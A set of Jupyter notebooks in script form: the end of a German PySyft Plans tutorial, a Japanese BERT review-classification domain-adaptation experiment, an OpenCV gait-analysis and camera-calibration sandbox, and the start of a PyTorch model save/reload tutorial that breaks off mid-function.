pointer_to_net_1 = net.send(device_1) pointer_to_data = device_1.search('input_data')[0] pointer_to_result = pointer_to_net_1(pointer_to_data) pointer_to_result.get() # Tatsächlich lassen sich andere PointerPlans einfach vom selben Plan aus nutzen und so bleibt die Syntax fürs Verwenden auf anderen Geräten identisch. pointer_to_net_2 = net.send(device_2) pointer_to_data = device_2.search('input_data')[0] pointer_to_result = pointer_to_net_2(pointer_to_data) pointer_to_result.get() # > Anmerkung: Aktuell lässt sich mit der Plan Klasse nur eine einzige Methode namens "forward" verwenden. # ### Automatisch Pläne bauen, welche auch Funktionen sind # # Für Funktionen (`@` `sy.func2plan`) kann der Plan automatisch gebaut werden ohne explizit die Methode `build` aufrufen zu müssen. In solchen Fällen ist der Plan direkt beim Erstellen gebaut. # # Um diese Funktionalität direkt nutzen zu können, muss der Dekorator nur mit dem zusätzlichen Argument `args_shape` aufgerufen werden. Dieses muss eine Liste aller Shapes der Funktions-Argumente enthalten. # + @sy.func2plan(args_shape=[(-1, 1)]) def plan_double_abs(x): x = x + x x = torch.abs(x) return x plan_double_abs.is_built # - # Der `args_shape` Parameter wird intern genutzt um Pseudo-Tensoren zu erschaffen, welche wiederum zum Bau des Plans verwendet werden. # + @sy.func2plan(args_shape=[(1, 2), (-1, 2)]) def plan_sum_abs(x, y): s = x + y return torch.abs(s) plan_sum_abs.is_built # - # Auch ist es möglich Zustands-Elemente der Funktion zu übergeben! @sy.func2plan(args_shape=[(1,)], state=(torch.tensor([1]), )) def plan_abs(x, state): bias, = state.read() x = x.abs() return x + bias pointer_plan = plan_abs.send(device_1) x_ptr = torch.tensor([-1, 0]).send(device_1) p = pointer_plan(x_ptr) p.get() # Um das Wissen zu vertiefen, kann das Tutorial "Part 8 bis" mit der Verwendung von Plänen und Protokollen verwendet werden! # ### PySyft auf GitHub einen Stern geben! 
# # Der einfachste Weg, unserer Community zu helfen, besteht darin, die GitHub-Repos mit Sternen auszuzeichnen! Dies hilft, das Bewusstsein für die coolen Tools zu schärfen, die wir bauen. # # - [Gib PySyft einen Stern](https://github.com/OpenMined/PySyft) # # ### Nutze unsere Tutorials auf GitHub! # # Wir haben hilfreiche Tutorials erstellt, um ein Verständnis für Federated und Privacy-Preserving Learning zu entwickeln und zu zeigen wie wir die einzelnen Bausteine weiter entwickeln. # # - [PySyft Tutorials ansehen](https://github.com/OpenMined/PySyft/tree/master/examples/tutorials) # # # ### Mach mit bei Slack! # # Der beste Weg, um über die neuesten Entwicklungen auf dem Laufenden zu bleiben, ist, sich unserer Community anzuschließen! Sie können dies tun, indem Sie das Formular unter [http://slack.openmined.org](http://slack.openmined.org) ausfüllen. # # ### Treten Sie einem Code-Projekt bei! # # Der beste Weg, um zu unserer Community beizutragen, besteht darin, Entwickler zu werden! Sie können jederzeit zur PySyft GitHub Issues-Seite gehen und nach "Projects" filtern. Dies zeigt Ihnen alle Top-Level-Tickets und gibt einen Überblick darüber, an welchen Projekten Sie teilnehmen können! Wenn Sie nicht an einem Projekt teilnehmen möchten, aber ein wenig programmieren möchten, können Sie auch nach weiteren "einmaligen" Miniprojekten suchen, indem Sie nach GitHub-Problemen suchen, die als "good first issue" gekennzeichnet sind. # # - [PySyft Projects](https://github.com/OpenMined/PySyft/issues?q=is%3Aopen+is%3Aissue+label%3AProject) # - [Good First Issue Tickets](https://github.com/OpenMined/PySyft/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22) # # ### Spenden # # Wenn Sie keine Zeit haben, zu unserer Codebase beizutragen, aber dennoch Unterstützung leisten möchten, können Sie auch Unterstützer unseres Open Collective werden. Alle Spenden fließen in unser Webhosting und andere Community-Ausgaben wie Hackathons und Meetups! 
# # - [OpenMined's Open Collective Page](https://opencollective.com/openmined)
examples/tutorials/translations/german/Part 08 - Introduction to Plans.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3.7.10 ('base')
#     language: python
#     name: python3
# ---

# +
import copy
import random

import numpy as np
import pandas as pd
import torch
from scipy import stats
from tqdm import tqdm
from transformers import BertForSequenceClassification, BertTokenizer

from util import calc_accuracy, calc_f1, init_device, load_params
from util.bert import sentence_to_loader
# -

# Initialize random seeds for reproducibility.
seed = 0
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True

device = init_device()

# Load parameters.
print("Loading parameters...")
params = load_params("/workspace/amazon_review/config/params_mmd.json")
params["batch_size"] = 4

# Load the dataset (JSON-lines review dumps).
train_df = pd.read_json(params["ja_train_path"], orient="record", lines=True)
if params["is_developing"]:
    train_df = train_df.sample(n=10000, random_state=1)
dev_df = pd.read_json(params["ja_dev_path"], orient="record", lines=True)
test_df = pd.read_json(params["ja_test_path"], orient="record", lines=True)

# Split into source-category and target-category frames.
# .copy() makes each split an independent DataFrame so the label assignment
# below writes to real data instead of a view of the parent frame
# (avoids SettingWithCopyWarning and silently-lost writes).
train_source_df = train_df[train_df["product_category"] == params["source_category"]].copy()
dev_source_df = dev_df[dev_df["product_category"] == params["source_category"]].copy()
test_source_df = test_df[test_df["product_category"] == params["source_category"]].copy()
train_target_df = train_df[train_df["product_category"] == params["target_category"]].copy()
dev_target_df = dev_df[dev_df["product_category"] == params["target_category"]].copy()
test_target_df = test_df[test_df["product_category"] == params["target_category"]].copy()

# Assign class labels.
for df in [train_source_df, dev_source_df, test_source_df, train_target_df, dev_target_df, test_target_df]:
    # Binary task: predict whether the star rating is greater than 3.
    df["class"] = 0
    # BUGFIX: was `df["class"][df["stars"] > 3] = 1` — chained indexing, which
    # may assign into a temporary copy and leave every label at 0.
    df.loc[df["stars"] > 3, "class"] = 1
    # For 5-class classification instead:
    # df["class"] = df["stars"] - 1

# Tokenization.
model_name = "cl-tohoku/bert-base-japanese-v2"
tokenizer = BertTokenizer.from_pretrained(model_name, do_lower_case=True)

# Build the dataloaders.
train_source_dataloader = sentence_to_loader(
    train_source_df.review_body.values,
    train_source_df["class"].values,
    tokenizer,
    params["batch_size"],
    shuffle=True,
)
dev_source_dataloader = sentence_to_loader(
    dev_source_df.review_body.values, dev_source_df["class"].values, tokenizer, params["batch_size"], shuffle=False
)
# test_source_dataloader = sentence_to_loader(
#     test_source_df.review_body.values,
#     test_source_df["class"].values,
#     tokenizer,
#     params["batch_size"],
#     shuffle=False,
# )
train_target_dataloader = sentence_to_loader(
    train_target_df.review_body.values,
    train_target_df["class"].values,
    tokenizer,
    params["batch_size"],
    shuffle=True,
)
# dev_target_dataloader = sentence_to_loader(
#     dev_target_df.review_body.values, dev_target_df["class"].values, tokenizer, params["batch_size"], shuffle=False
# )
test_target_dataloader = sentence_to_loader(
    test_target_df.review_body.values,
    test_target_df["class"].values,
    tokenizer,
    params["batch_size"],
    shuffle=False,
)

# Build the BERT classifier.
model = BertForSequenceClassification.from_pretrained(
    model_name,
    num_labels=params["class_num"],
    output_attentions=False,
    output_hidden_states=False,
)
model.to(device)

# Optimizer; hyperparameters recommended in the BERT paper.
optimizer = torch.optim.AdamW(model.parameters(), lr=6e-6, eps=1e-8)
epochs = 3

# Train on the source category, validating after every epoch.
for epoch in range(epochs):
    print(f"\n======== Epoch {epoch+1} / {epochs} ========\nTraining")
    total_train_loss = 0
    model.train()
    for step, (input_id_batch, input_mask_batch, label_batch) in tqdm(
        enumerate(train_source_dataloader), total=len(train_source_dataloader)
    ):
        input_id_batch = input_id_batch.to(device).to(torch.int64)
        input_mask_batch = input_mask_batch.to(device).to(torch.int64)
        label_batch = label_batch.to(device).to(torch.int64)
        model.zero_grad()
        result = model(input_id_batch, token_type_ids=None, attention_mask=input_mask_batch, labels=label_batch)
        total_train_loss += result.loss.item()
        result.loss.backward()
        # Clip gradients to stabilize training.
        torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
        optimizer.step()
    avg_train_loss = total_train_loss / len(train_source_dataloader)
    print(f"\n\tAverage training loss: {avg_train_loss:.2f}")

    # Evaluate on the source dev set.
    print("\nRunning Validation")
    total_dev_loss = 0
    total_dev_accuracy = 0
    total_dev_f1 = 0
    model.eval()
    for step, (input_id_batch, input_mask_batch, label_batch) in tqdm(
        enumerate(dev_source_dataloader), total=len(dev_source_dataloader)
    ):
        input_id_batch = input_id_batch.to(device).to(torch.int64)
        input_mask_batch = input_mask_batch.to(device).to(torch.int64)
        label_batch = label_batch.to(device).to(torch.int64)
        with torch.no_grad():
            result = model(input_id_batch, token_type_ids=None, attention_mask=input_mask_batch, labels=label_batch)
        total_dev_loss += result.loss.item()
        logit_array = result.logits.detach().cpu().numpy()
        label_array = label_batch.cpu().numpy()
        # Metrics are averaged over batches.
        total_dev_accuracy += calc_accuracy(label_array, logit_array)
        total_dev_f1 += calc_f1(label_array, logit_array)
    avg_dev_loss = total_dev_loss / len(dev_source_dataloader)
    print(f"\tDev Loss: {avg_dev_loss:.3f}")
    avg_dev_accuracy = total_dev_accuracy / len(dev_source_dataloader)
    print(f"\tAccuracy: {avg_dev_accuracy:.3f}")
    avg_dev_f1 = total_dev_f1 / len(dev_source_dataloader)
    print(f"\tF1: {avg_dev_f1:.3f}")

# Run the target fine-tuning several times (bootstrap over target samples).
print("\ntargetでFineTuning開始")

# Keep the source-pretrained model.
# deepcopy so the fine-tuned copies do not share memory with it.
model_pretrained = copy.deepcopy(model.cpu())

# +
params["target_ratio"] = [0.01, 0.05, 0.1, 0.3, 0.5]

for target_ratio in params["target_ratio"]:
    print("------------------------------")
    print(f"target_ratio = {target_ratio}")
    print("------------------------------")
    accuracy_list = []
    f1_list = []
    for count in range(params["trial_count"]):
        print(f"\n{count+1}回目の試行")
        # Prepare target fine-tuning data: subsample the target set down to
        # target_ratio of the source size.
        source_num = train_source_df.shape[0]
        target_num = int(source_num * target_ratio)
        if target_num > train_target_df.shape[0]:
            # NOTE(review): exit() kills the kernel in a notebook; consider
            # raising ValueError instead.
            print("Target ratio is too large.")
            exit()
        train_target_df_sample = train_target_df.sample(target_num, replace=False)
        print(f"Source num: {source_num}, Target num: {target_num}")
        # Build the target dataloader for this trial.
        train_target_dataloader = sentence_to_loader(
            train_target_df_sample.review_body.values,
            train_target_df_sample["class"].values,
            tokenizer,
            params["batch_size"],
            shuffle=True,
        )
        # Reload the source-pretrained model for a fresh trial.
        model = copy.deepcopy(model_pretrained).to(device)
        optimizer = torch.optim.AdamW(model.parameters(), lr=6e-6, eps=1e-8)
        # Fine-tune on the target category.
        for epoch in range(epochs):
            print(f"======== Epoch {epoch+1} / {epochs} ========")
            total_train_loss = 0
            model.train()
            for step, (input_id_batch, input_mask_batch, label_batch) in enumerate(train_target_dataloader):
                input_id_batch = input_id_batch.to(device).to(torch.int64)
                input_mask_batch = input_mask_batch.to(device).to(torch.int64)
                label_batch = label_batch.to(device).to(torch.int64)
                model.zero_grad()
                result = model(
                    input_id_batch, token_type_ids=None, attention_mask=input_mask_batch, labels=label_batch
                )
                total_train_loss += result.loss.item()
                result.loss.backward()
                torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
                optimizer.step()
            avg_train_loss = total_train_loss / len(train_target_dataloader)
            print(f"Training Target Loss: {avg_train_loss:.2f}")
        # Evaluate once per trial on the target test set.
        total_test_loss = 0
        total_test_accuracy = 0
        total_test_f1 = 0
        model.eval()
        for step, (input_id_batch, input_mask_batch, label_batch) in enumerate(test_target_dataloader):
            input_id_batch = input_id_batch.to(device).to(torch.int64)
            input_mask_batch = input_mask_batch.to(device).to(torch.int64)
            label_batch = label_batch.to(device).to(torch.int64)
            with torch.no_grad():
                result = model(
                    input_id_batch, token_type_ids=None, attention_mask=input_mask_batch, labels=label_batch
                )
            total_test_loss += result.loss.item()
            logit_array = result.logits.detach().cpu().numpy()
            label_array = label_batch.cpu().numpy()
            total_test_accuracy += calc_accuracy(label_array, logit_array)
            total_test_f1 += calc_f1(label_array, logit_array)
        avg_test_loss = total_test_loss / len(test_target_dataloader)
        print(f"\nTest Target Loss: {avg_test_loss:.2f}")
        avg_test_accuracy = total_test_accuracy / len(test_target_dataloader)
        accuracy_list.append(avg_test_accuracy)
        print(f"Test Target Accuracy: {avg_test_accuracy:.2f}")
        avg_test_f1 = total_test_f1 / len(test_target_dataloader)
        f1_list.append(avg_test_f1)
        print(f"Test Target F1: {avg_test_f1:.2f}")

    # 95% confidence intervals over the bootstrap trials.
    # NOTE(review): scipy renamed `alpha` to `confidence` in stats.t.interval;
    # recent scipy versions reject `alpha` — pin scipy or rename when upgrading.
    accuracy_interval = stats.t.interval(
        alpha=0.95, df=len(accuracy_list) - 1, loc=np.mean(accuracy_list), scale=stats.sem(accuracy_list)
    )
    f1_interval = stats.t.interval(alpha=0.95, df=len(f1_list) - 1, loc=np.mean(f1_list), scale=stats.sem(f1_list))
    print("\n\t\tMean, Std, 95% interval (bottom, up)")
    print(
        f"Accuracy\t{np.mean(accuracy_list):.2f}, {np.std(accuracy_list, ddof=1):.2f}, {accuracy_interval[0]:.2f}, {accuracy_interval[1]:.2f}"
    )
    print(
        f"F1 Score\t{np.mean(f1_list):.2f}, {np.std(f1_list, ddof=1):.2f}, {f1_interval[0]:.2f}, {f1_interval[1]:.2f}"
    )
amazon_review/train_bert.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# +
#webcam
# Show the live webcam feed until ESC (27) is pressed.
import cv2
import numpy as np

cap = cv2.VideoCapture(0)
while(cap.isOpened()):
    ret, frame = cap.read()
    if ret:
        cv2.imshow("frame", frame)
        key = cv2.waitKey(30)
        if key == 27:
            break
    else:
        break
cap.release()
cv2.destroyAllWindows()
# -

# Rainbow colour constants.
# NOTE(review): OpenCV drawing functions take BGR order, but these read as RGB
# values — confirm intended channel order before use.
Violet=(148, 0, 211)
Indigo=(75, 0, 130)
Blue=(0, 0, 255)
Green=(0, 255, 0)
Yellow=(255, 255, 0)
Orange=(255, 127, 0)
Red=(255, 0 , 0)

# +
#just show video from sequence
# Play back a numbered JPEG image sequence as video.
import cv2
import numpy as np

cv2.namedWindow('image',cv2.WINDOW_NORMAL)
cv2.resizeWindow('image', 1280,720)
cap = cv2.VideoCapture("C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\walking_77_image_sequence\\img (%d).jpg")
while(cap.isOpened()):
    ret, frame = cap.read()
    if ret:
        cv2.imshow("image", frame)
        key = cv2.waitKey(30)
        if key == 27:
            break
    else:
        break
cap.release()
cv2.destroyAllWindows()
# -

# +
#just show video
# Play back a .MOV video file.
import cv2
import numpy as np

cv2.namedWindow('image',cv2.WINDOW_NORMAL)
cv2.resizeWindow('image', 1280,720)
cap = cv2.VideoCapture("C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\walking_videos\\DSC_0077.MOV")
while(cap.isOpened()):
    ret, frame = cap.read()
    if ret:
        cv2.imshow("image", frame)
        key = cv2.waitKey(30)
        if key == 27:
            break
    else:
        break
cap.release()
cv2.destroyAllWindows()
# -

# +
#MOG
# Background subtraction with the MOG algorithm (opencv-contrib bgsegm module).
import cv2
import numpy as np

cv2.namedWindow('image',cv2.WINDOW_NORMAL)
cv2.resizeWindow('image', 1280,720)
cap = cv2.VideoCapture("C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\walking_videos\\DSC_0077.MOV")
fgbg = cv2.bgsegm.createBackgroundSubtractorMOG()
while(cap.isOpened()):
    ret, frame = cap.read()
    if ret:
        fgmask = fgbg.apply(frame)
        cv2.imshow('image',fgmask)
        key = cv2.waitKey(30)
        if key == 27:
            break
    else:
        break
cap.release()
cv2.destroyAllWindows()
# -

# +
#MOG2
# Background subtraction with MOG2 (built into core OpenCV).
import cv2
import numpy as np

cv2.namedWindow('image',cv2.WINDOW_NORMAL)
cv2.resizeWindow('image', 1280,720)
cap = cv2.VideoCapture("C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\walking_videos\\DSC_0077.MOV")
# Very long history + low threshold => an almost static background model.
subtractor = cv2.createBackgroundSubtractorMOG2(history=1000000, varThreshold=5, detectShadows=False)
while(cap.isOpened()):
    ret, frame = cap.read()
    if ret:
        mask = subtractor.apply(frame)
        cv2.imshow("image", mask)
        key = cv2.waitKey(30)
        if key == 27:
            break
    else:
        break
cap.release()
cv2.destroyAllWindows()
# -

# +
#Manual
# Manual background subtraction: absolute difference against the first frame.
import cv2
import numpy as np

cv2.namedWindow('image',cv2.WINDOW_NORMAL)
cv2.resizeWindow('image', 1280,720)
cap = cv2.VideoCapture("C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\walking_videos\\DSC_0077.MOV")
_, first_frame = cap.read()
first_gray = cv2.cvtColor(first_frame, cv2.COLOR_BGR2GRAY)
first_gray = cv2.GaussianBlur(first_gray, (5, 5), 0)
while(cap.isOpened()):
    ret, frame = cap.read()
    if ret:
        gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        gray_frame = cv2.GaussianBlur(gray_frame, (5, 5), 0)
        difference = cv2.absdiff(first_gray, gray_frame)
        _, difference = cv2.threshold(difference, 25, 255, cv2.THRESH_BINARY)
        # NOTE(review): three imshow calls share the window name "image",
        # so only the last (difference) is actually visible — confirm intent.
        cv2.imshow("image", first_frame)
        cv2.imshow("image", frame)
        cv2.imshow("image", difference)
        key = cv2.waitKey(30)
        if key == 27:
            break
    else:
        break
cap.release()
cv2.destroyAllWindows()
# -

# +
#cornor detection normal image
# Harris corner detection on each video frame; corners painted red.
import cv2
import numpy as np

cv2.namedWindow('image',cv2.WINDOW_NORMAL)
cv2.resizeWindow('image', 1280,720)
cap = cv2.VideoCapture("C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\walking_videos\\DSC_0077.MOV")
while(cap.isOpened()):
    ret, frame = cap.read()
    if ret:
        gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
        gray = np.float32(gray)
        dst = cv2.cornerHarris(gray,2,3,0.04)
        #result is dilated for marking the corners, not important
        dst = cv2.dilate(dst,None)
        # Threshold for an optimal value, it may vary depending on the image.
        frame[dst>0.01*dst.max()]=[0,0,255]
        cv2.imshow("image", frame)
        key = cv2.waitKey(30)
        if key == 27:
            break
    else:
        break
cap.release()
cv2.destroyAllWindows()
# -

# +
#webcam detect marker(with highlight level threshold)
# Find bright (>=250 gray level) reflective markers in the webcam feed and
# outline their contours in red.
import cv2
import numpy as np

cap = cv2.VideoCapture(0)
while(cap.isOpened()):
    ret, frame, = cap.read()
    if ret:
        imgray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
        imblur1 = cv2.medianBlur(imgray,5)
        imblur2 = cv2.GaussianBlur(imblur1,(5,5),0)
        ret,thresh = cv2.threshold(imblur2,250,255,cv2.THRESH_BINARY)
        contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
        #print("Number of objects found = ", len(contours))
        cv2.drawContours(frame, contours, -1, (0,0,255), 10)
        cv2.imshow("frame", frame)
        key = cv2.waitKey(30)
        if key == 27:
            break
    else:
        break
cap.release()
cv2.destroyAllWindows()
# -

# +
#image edge detection
# Canny edge detection on a still image.
import cv2
import numpy as np

cv2.namedWindow('image',cv2.WINDOW_NORMAL)
#cv2.resizeWindow('image', 2000,1242)
cv2.resizeWindow('image', 560,996)
img = cv2.imread('C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\Azmall_image\BAzmall.jpg',1)
#img = cv2.imread('fap.png',1)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(gray,(7,7),0)
canny2 = cv2.Canny(blur, 50, 100)
cv2.imshow("image", canny2)
k = cv2.waitKey(0)
if k == 27:         # wait for ESC key to exit
    cv2.destroyAllWindows()
# -

# +
#show marker coordinate in image
# Threshold a still image for bright markers, then label each contour with
# its centroid coordinates (computed from image moments).
import cv2
import numpy as np
from matplotlib import pyplot as plt

cv2.namedWindow('image',cv2.WINDOW_NORMAL)
cv2.resizeWindow('image', 560,996)
cv2.namedWindow('image2',cv2.WINDOW_NORMAL)
cv2.resizeWindow('image2', 560,996)
img = cv2.imread('C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\Azmall_image\FAzmall.jpg')
imgray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
imblur1 = cv2.medianBlur(imgray,5)
imblur2 = cv2.GaussianBlur(imblur1,(5,5),0)
ret,thresh = cv2.threshold(imblur2,250,255,cv2.THRESH_BINARY)
contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
print("Number of objects found = ", len(contours))
i = 0
for c in contours:
    # calculate moments for each contour
    M = cv2.moments(c)
    # calculate x,y coordinate of center
    if M["m00"] != 0:
        cX = int(M["m10"] / M["m00"])
        cY = int(M["m01"] / M["m00"])
    else:
        # degenerate (zero-area) contour — fall back to origin
        cX = 0
        cY = 0
    i+=1
    # print('\nX',i,' ',cX)
    #print('Y',i,' ',cY)
    centroid = "X"+str(i)+":"+str(cX)+", Y"+str(i)+":"+str(cY)
    cv2.putText(img,centroid , (cX - 25, cY - 25),cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255, 255), 2)
cv2.drawContours(img, contours, -1, (0,0,255), 10)
cv2.imshow("image", img)
cv2.imshow("image2",thresh)
k = cv2.waitKey(0)
if k == 27:         # wait for ESC key to exit
    cv2.destroyAllWindows()
# -

# +
#save video
# Re-encode the image sequence to an XVID .avi while displaying it.
# NOTE(review): out.release() is never called — the output file may be
# truncated; verify.
import cv2
import numpy as np
from matplotlib import pyplot as plt

cv2.namedWindow('image',cv2.WINDOW_NORMAL)
cv2.resizeWindow('image', 1280,720)
cap = cv2.VideoCapture("C:\\Users\sunny.DESKTOP-QGFGEEK\Desktop\GitClone\\1_camera_gait_analysis\walking_77_image_sequence\\img (%d).jpg")
# Define the codec and create VideoWriter object
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter('77marked.avi',fourcc, 23.9, (1920,1080))
while(cap.isOpened()):
    ret, frame, = cap.read()
    if ret:
        #frame = cv2.flip(frame,0)
        # write the flipped frame
        out.write(frame)
        cv2.imshow("image", frame)
        key = cv2.waitKey(30)
        if key == 27:
            break
    else:
        break
cap.release()
cv2.destroyAllWindows()
# -

# Convenience cell: close any leftover OpenCV windows.
import cv2
cv2.destroyAllWindows()

# +
#calibrate camera
# Calibrate the webcam from live views of a 7x7 inner-corner chessboard.
import numpy as np
import cv2
import glob

# termination criteria
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)
# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
objp = np.zeros((7*7,3), np.float32)
objp[:,:2] = np.mgrid[0:7,0:7].T.reshape(-1,2)
# Arrays to store object points and image points from all the images.
objpoints = [] # 3d point in real world space
imgpoints = [] # 2d points in image plane.
images = cv2.VideoCapture(0)
while(images.isOpened()):
    ret, frame = images.read()
    if ret:
        gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
        # Find the chess board corners
        ret, corners = cv2.findChessboardCorners(gray, (7,7),None)
        # If found, add object points, image points (after refining them)
        if ret == True:
            objpoints.append(objp)
            cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)
            imgpoints.append(corners)
            # Draw and display the corners
            cv2.drawChessboardCorners(frame, (7,7), corners,ret)
            # NOTE(review): recalibrating on every detected frame is very
            # expensive — the usual pattern calibrates once after the loop.
            ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1],None,None)
        cv2.imshow('frame',frame)
        key = cv2.waitKey(100)
        if key == 27:
            break
    else:
        break
images.release()
cv2.destroyAllWindows()
# NOTE(review): if no chessboard was ever detected, mtx/dist/rvecs/tvecs are
# undefined here and this raises NameError — verify.
np.savez("B.npz", mtx = mtx, dist = dist , rvecs = rvecs, tvecs = tvecs)
# -

# +
#B.npz checker
# Sanity check: compare the saved calibration file against the in-memory
# variables from the previous cell.
data = np.load("B.npz")
a1 = data['mtx']
print(a1)
b1 = data['dist']
print(b1)
a2 = data['rvecs']
print(a2)
b2 = data['tvecs']
print(b2)
print("==========================================")
print(mtx)
print(dist)
print(rvecs)
print(tvecs)
# -

# +
#draw 3d on chessboard
# Estimate the chessboard pose with solvePnPRansac and draw 3D axes on it.
import cv2
import numpy as np
import glob

# Load previously saved data
with np.load('B.npz') as X:
    mtx, dist, _, _ = [X[i] for i in ('mtx','dist','rvecs','tvecs')]

def draw(img, corners, imgpts):
    # Draw the projected x/y/z axes from the first chessboard corner.
    corner = tuple(corners[0].ravel())
    img = cv2.line(img, corner, tuple(imgpts[0].ravel()), (255,0,0), 5)
    img = cv2.line(img, corner, tuple(imgpts[1].ravel()), (0,255,0), 5)
    img = cv2.line(img, corner, tuple(imgpts[2].ravel()), (0,0,255), 5)
    return img

def drawBox(img, corners, imgpts):
    # Draw a projected 3D cube (8 image points: 4 floor + 4 top).
    imgpts = np.int32(imgpts).reshape(-1,2)
    # draw ground floor in green
    img = cv2.drawContours(img, [imgpts[:4]],-1,(0,255,0),-3)
    # draw pillars in blue color
    for i,j in zip(range(4),range(4,8)):
        img = cv2.line(img, tuple(imgpts[i]), tuple(imgpts[j]),(255),3)
    # draw top layer in red color
    img = cv2.drawContours(img, [imgpts[4:]],-1,(0,0,255),3)
    return img

criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)
objp = np.zeros((7*7,3), np.float32)
objp[:,:2] = np.mgrid[0:7,0:7].T.reshape(-1,2)
# Axis endpoints in chessboard-square units (z points out of the board).
axis = np.float32([[3,0,0], [0,3,0], [0,0,-3]]).reshape(-1,3)
#axis = np.float32([[0,0,0], [0,3,0], [3,3,0], [3,0,0],
#                   [0,0,-3],[0,3,-3],[3,3,-3],[3,0,-3] ])
cap = cv2.VideoCapture(0)
while(cap.isOpened()):
    ret, img = cap.read()
    if ret:
        gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
        ret, corners = cv2.findChessboardCorners(gray, (7,7),None,cv2.CALIB_CB_ADAPTIVE_THRESH + cv2.CALIB_CB_NORMALIZE_IMAGE + cv2.CALIB_CB_FAST_CHECK)
        if ret == True:
            corners2 = cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)
            # Find the rotation and translation vectors.
            _, rvecs, tvecs, inliers = cv2.solvePnPRansac(objp, corners2, mtx, dist)
            # project 3D points to image plane
            imgpts, jac = cv2.projectPoints(axis, rvecs, tvecs, mtx, dist)
            img = draw(img,corners2,imgpts)
        cv2.imshow('img',img)
        key = cv2.waitKey(30)
        if key == 27:
            break
    else:
        break
cap.release()
cv2.destroyAllWindows()
# -
test_cv2_video_function_sandbox.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # 304 Save and Reload
#
# """
# View more, visit my tutorial page: https://morvanzhou.github.io/tutorials/
# My Youtube Channel: https://www.youtube.com/user/MorvanZhou
#
# Save the nets and/or parameters in python pickle format

# +
import torch
# NOTE(review): torch.autograd.Variable is deprecated since PyTorch 0.4 —
# plain tensors carry autograd state now; kept for this legacy tutorial.
from torch.autograd import Variable
import matplotlib.pyplot as plt
# %matplotlib inline

torch.manual_seed(1)    # reproducible
# -

# ### Generate some fake data

x = torch.unsqueeze(torch.linspace(-1, 1, 100), dim=1)  # x data (tensor), shape=(100, 1)
y = x.pow(2) + 0.2*torch.rand(x.size())                 # noisy y data (tensor), shape=(100, 1)
x, y = Variable(x, requires_grad=False), Variable(y, requires_grad=False)

def save():
    """Train a small regression net on the module-level (x, y) data, plot
    its fit, and persist it twice: the whole pickled module ('net.pkl')
    and the parameters alone ('net_params.pkl')."""
    # save net1
    net1 = torch.nn.Sequential(
        torch.nn.Linear(1, 10),
        torch.nn.ReLU(),
        torch.nn.Linear(10, 1)
    )
    optimizer = torch.optim.SGD(net1.parameters(), lr=0.5)
    loss_func = torch.nn.MSELoss()

    # fit y ~ x^2 for 100 gradient steps
    for t in range(100):
        prediction = net1(x)
        loss = loss_func(prediction, y)
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()

    # plot result
    plt.figure(1, figsize=(10, 3))
    plt.subplot(131)
    plt.title('Net1')
    plt.scatter(x.data.numpy(), y.data.numpy())
    plt.plot(x.data.numpy(), prediction.data.numpy(), 'r-', lw=5)

    # 2 ways to save the net
    torch.save(net1, 'net.pkl')  # save entire net
    torch.save(net1.state_dict(), 'net_params.pkl')   # save only the parameters

def restore_net():
    """Reload the whole pickled network from 'net.pkl' and plot its
    predictions; requires save() to have run first."""
    # restore entire net1 to net2
    net2 = torch.load('net.pkl')
    prediction = net2(x)

    # plot result
    plt.subplot(132)
    plt.title('Net2')
    plt.scatter(x.data.numpy(), y.data.numpy())
    plt.plot(x.data.numpy(), prediction.data.numpy(), 'r-', lw=5)

def restore_params():
    """Rebuild the same architecture from scratch and load only the saved
    parameters from 'net_params.pkl' — the recommended (and usually
    faster) way to restore a model."""
    # restore only the parameters in net1 to net3
    net3 = torch.nn.Sequential(
